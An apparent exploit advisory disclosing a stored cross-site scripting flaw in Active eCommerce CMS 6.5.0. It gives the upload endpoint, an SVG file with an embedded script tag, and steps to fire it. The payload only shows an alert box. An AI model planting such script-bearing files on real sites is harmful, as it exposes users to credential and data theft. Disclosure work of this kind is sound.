# Exploit Title: Active eCommerce CMS 6.5.0 – ‘svg’ Stored Cross-Site Scripting (XSS)
# Date: 19/01/2023
# Exploit Author: Sajibe Kanti
# Vendor Name: ActiveITzone
# Vendor Homepage: https://activeitzone.com/
# Software Link: https://codecanyon.net/item/active-ecommerce-cms/23471405
# Version: 6.5.0
# Tested on: Live (CentOS & LiteSpeed Web Server)
# Demo Link : https://demo.activeitzone.com/ecommerce/
# Description
Active eCommerce CMS 6.5.0 has a security vulnerability: the profile
picture upload allows stored cross-site scripting (XSS) attacks. The
vulnerability is in how the application handles "svg" images, which may
contain malicious code and can be saved as files. An attacker can
exploit this vulnerability by uploading a specially crafted "svg" file
as a profile photo, which is then executed by the application when the
user views the profile. The attacker can then steal sensitive
information such as passwords or other data, or commit other malicious
acts. This vulnerability highlights that proper validation and image
file handling are critical in web application development.
# Exploit Details #
# Vulnerable Path : /aiz-uploader/upload
# Parameter: files (POST)
# Vector: <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100"
style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script>
alert("haha XSS");
</script>
</svg>
# Proof of Concept (PoC), Exploit
1) Go to: https://localhost
2) Register by clicking here
3) Login to Your Account
4) Go to Manage Your Profile
5) Upload the given vector as anyname.svg (save the vector in an
anyname.svg file)
6) Click on the upload to view your profile picture
7) XSS popup will be fired
# Image PoC: Refer Image
1) Payload Fired: https://prnt.sc/cW0F_BtpyMcv